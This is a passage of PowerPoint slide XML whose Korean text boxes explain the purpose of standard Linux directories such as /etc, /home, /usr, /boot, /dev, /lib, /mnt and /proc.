                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3EB499-195E-4017-8133-567E340C22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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EA29DF-F8D2-4555-B80F-052ABC5216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047" t="1269" r="13451" b="4377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="580444" y="1709043"/>
            <a:ext cx="3983183" cy="4834399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7776ADAE-1FE2-4A85-95B3-B65981CB1961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="162" r="53289" b="1649"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965791" y="3415652"/>
            <a:ext cx="6480893" cy="2805055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="직선 화살표 연결선 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2B4B89-DA9C-484A-A1D2-77AC42133982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4431836" y="2255928"/>
            <a:ext cx="53395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62493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15024397-6C5F-474C-85A3-0C0AF9A51530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="직사각형 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA7C7DDC-9B14-4B1E-BA14-6912EBE266D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/media</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FB5443-D50C-4B90-B542-41C5EB7C6A01}"/>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CD/DVD </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>또는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FDD, USB </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>등이 임시로 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트되는</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 역할 수행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17" name="사각형: 둥근 모서리 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D446D4-1D19-4AE8-B117-49D7115155AA}"/>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마운트 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D2BC99-C4B4-41BF-BECE-C88F7C2AD8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="3061636"/>
            <a:ext cx="366427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/etc</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 대한 환경 설정과 관련된 파일 및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 관리를 위한 암호 관련 파일</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네트워크 정보를 보유한 파일 등 시스템 관리에 전반적인 파일들 존재</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설정 파일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리눅스 시스템의 최상위 디렉토리</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>디렉토리 구조의 시작</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>리눅스는 루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>(/)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>를 기준으로 디렉토리를 생성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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>(Root) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>디렉토리</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="그룹 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4747D3D-08A0-46E2-B558-BBAEB9BCC0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="482391" y="5525334"/>
            <a:ext cx="3664276" cy="1059652"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1059652"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="직사각형 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4A72D9-83CC-478F-B422-681B0DA5F4C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/home</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A93174-3291-480C-A251-FEB9851EABCF}"/>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계정을 사용하는 사용자들의 홈 디렉토리</a:t>
              </a:r>
            </a:p>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FTP, www </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>등과 같은 서비스 디렉토리들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원격접속을 시도하는 사용자들을 위한 공간으로 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="사각형: 둥근 모서리 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366DC359-8AEE-46DD-9F7D-55DCA56DE37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일반 사용자들의 홈 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="그룹 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653AEE22-AA5F-4762-A2BC-6D4E6522DC13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="직사각형 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3917340-CEB3-4D0F-8233-22317DEF3BA3}"/>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usr</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF7BD66-CBE8-4CA6-8067-31994C3C3B50}"/>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사용자가 사용할 응용 패키지 프로그램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사용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>윈도우 운영체제에서의 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>Program Files</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>와 같은 역할</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>시스템에 사용되는 응용 프로그램들이 설치되는 디렉토리</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="사각형: 둥근 모서리 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DCE005-2853-48B1-BAA1-77E63FDA952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응용 패키지 프로그램 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="그룹 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF5C38C-6269-4D59-9A7C-A5369356BFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="3061636"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="직사각형 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB41DAB3-C286-4D99-A592-EC58B46B18BF}"/>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/boot</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35EC8257-640D-4F86-9F0B-2241BCEACE07}"/>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커널이 저장되어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리눅스 부트에 필요한 부팅 지원 파일들</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="사각형: 둥근 모서리 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA367CB3-342B-46F3-95F5-538E0ECCD619}"/>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부팅 관련 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="그룹 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F48A66-85A2-4532-AA9B-B6801194013D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="5525334"/>
            <a:ext cx="3664276" cy="1059652"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1059652"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="직사각형 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174AE4DA-36E7-497D-8588-2DF6B7281A59}"/>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/dev</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7D2BF4-40B5-4C51-90C1-FE9CBB30F952}"/>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장치 드라이버들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리눅스에서는 각종 장치들을 하나의 파일로 취급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 장치를 설치하는데 필요한 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>정보 저장</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="사각형: 둥근 모서리 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B6BB1F-0289-4065-A80D-0D85921A3A3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디바이스 장치 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="그룹 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774F29DD-3899-462E-A32C-917463E58D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="직사각형 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5ACD92-7C90-4010-A82D-8170CC27130D}"/>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/lib</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="TextBox 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DB8345-BFDD-4277-893B-688B0186EC9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프로그램들의 라이브러리들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대부분 공유 라이브러리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평소에는 파일 크기를 줄여서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라이브러리 실행 시 풀어서 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="사각형: 둥근 모서리 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BA9BC7-8D35-4DFD-B46B-68D0E84557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공유 라이브러리 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="그룹 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BC519B-02C5-4850-82B5-62E79AAB6FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="3061636"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="직사각형 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3367E09-49BC-4079-A387-FFB8979078F7}"/>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mnt</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A222E4E4-56A4-4E92-BD41-CB4FC66E6D40}"/>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입출력 장치와 연결할 때 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트하게</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 되면 해당 파일 시스템의 내용이 이 디렉토리에 저장됨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56" name="사각형: 둥근 모서리 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F192640-9628-42F4-999A-494D70D9281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입출력 장치 연결 마운트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sbin</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관리</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부팅</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복구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보수 등</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를 위한 명령어들</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운영에 필요한 명령어들 포함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만이 사용할 수 있는 명령어들로 구성</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운영 명령어 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="그룹 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EBB465-6195-4D4D-B476-B70753861828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="5525334"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="직사각형 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF1377A-259C-4BF0-B09E-E5B9790A430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/proc</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="TextBox 62">
              <a:extLst>
